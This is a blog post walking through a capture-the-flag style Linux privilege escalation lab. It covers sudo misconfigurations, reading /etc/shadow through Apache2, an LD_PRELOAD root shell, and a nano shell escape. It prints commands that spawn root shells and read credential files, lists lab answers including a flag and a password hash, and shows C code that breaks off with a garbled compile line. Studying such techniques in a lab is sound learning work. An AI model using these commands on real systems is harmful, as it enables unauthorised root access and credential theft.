Sudo nano Privilege Escalation

Hacking Truth


Sudo nano Privilege Escalation


Privilege escalation ideally leads to root privileges. This can sometimes be achieved simply by exploiting an existing vulnerability, or in some cases by accessing another user account that has more privileges, information, or access.

Unless a single vulnerability leads to a root shell, the privilege escalation process will rely on misconfigurations and lax permissions.

The sudo command, by default, allows you to run a program with root privileges. Under some conditions, system administrators may need to give regular users some flexibility on their privileges. For example, a junior SOC analyst may need to use Nmap regularly but would not be cleared for full root access. In this situation, the system administrator can allow this user to only run Nmap with root privileges while keeping its regular privilege level throughout the rest of the system.

Any user can check its current situation related to root privileges using the sudo -l command. is a valuable source that provides information on how any program, on which you may have sudo rights, can be used.

Leverage application functions

Some applications will not have a known exploit within this context. Such an application you may see is the Apache2 server.

In this case, we can use a "hack" to leak information leveraging a function of the application. As you can see below, Apache2 has an option that supports loading alternative configuration files (-f : specify an alternate ServerConfigFile).

Loading the /etc/shadow file using this option will result in an error message that includes the first line of the /etc/shadow file.


On some systems, you may see the LD_PRELOAD environment option.

LD_PRELOAD is a function that allows any program to use shared libraries. This blog post will give you an idea about the capabilities of LD_PRELOAD. If the "env_keep" option is enabled we can generate a shared library which will be loaded and executed before the program is run. Please note the LD_PRELOAD option will be ignored if the real user ID is different from the effective user ID.

The steps of this privilege escalation vector can be summarized as follows;


  • Check for LD_PRELOAD (with the env_keep option)
  • Write a simple C code compiled as a share object (.so extension) file.
  • Run the program with sudo rights and the LD_PRELOAD option pointing to our .so file  


The C code will simply spawn a root shell and can be written as follows;



  #include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {

We can save this code as shell.c and compile it using gcc into a shared object file using the following parameters;

gcc -fPIC -shared -o shell.c -nostartfiles


Sudo nano Privilege Escalation

We can now use this shared object file when launching any program our user can run with sudo. In our case, Apache2, find, or almost any of the programs we can run with sudo can be used.

We need to run the program by specifying the LD_PRELOAD option, as follows;

sudo LD_PRELOAD=/home/user/ldpreload/ find

This will result in a shell spawn with root privileges. 

Sudo nano Privilege Escalation

But we are using different method from above the content like "nano LinPrivEsc"

Now, first  First we will use ssh and we will come inside his house without informing ( atithi devo bhaava ) :-p


Sudo nano Privilege Escalation



└─$ ssh karen@
karen@'s password: 
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-1029-aws x86_64)

 * Documentation:
 * Management:
 * Support:

  System information as of Tue Jan  3 06:35:50 UTC 2023

  System load:  0.0               Processes:             99
  Usage of /:   4.6% of 29.02GB   Users logged in:       0
  Memory usage: 39%               IPv4 address for eth0:
  Swap usage:   0%

1 update can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable

The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to Check your Internet connection or proxy settings

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

Last login: Tue Jan  3 05:41:12 2023 from
Could not chdir to home directory /home/karen: No such file or directory
$ whoami                                                                                                                                                                
$ id                                                                                                                                                                    
uid=1001(karen) gid=1001(karen) groups=1001(karen)                                                                                                                      


Here are three option to exploit the machine.



Sudo nano Privilege Escalation



# How many programs can the user "karen" run on the target system with sudo rights?

Ans - 3

For this, we will use and search nano and choose in binary (nano) and functions (sudo).



Sudo nano Privilege Escalation


# What is the content of the flag2.txt file?

Ans - THM-402028394

Sudo nano Privilege Escalation

sudo nano
reset; sh 1>&0 2>&0


ctrl + r


Sudo nano Privilege Escalation

ctrl + x

Sudo nano Privilege Escalation

reset; sh 1>&0 2>&0


hit enter


Sudo nano Privilege Escalation

ctrl + c

Sudo nano Privilege Escalation



cd /home/ubuntu

cat flag2.txt

Sudo nano Privilege Escalation

Sudo nano Privilege Escalation



# How would you use Nmap to spawn a root shell if your user had sudo rights on nmap?

Ans - sudo nmap --interactive

# What is the hash of frank's password?

cat /etc/shadow



Sudo nano Privilege Escalation



Ans - $6$2.sUUDsOLIpXKxcr$eImtgFExyr2ls4jsghdD3DHLHHP9X50Iv




All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.



Post a Comment

* Please Don't Spam Here. All the Comments are Reviewed by Admin.
Post a Comment (0)
Our website uses cookies to enhance your experience. Learn More
Accept !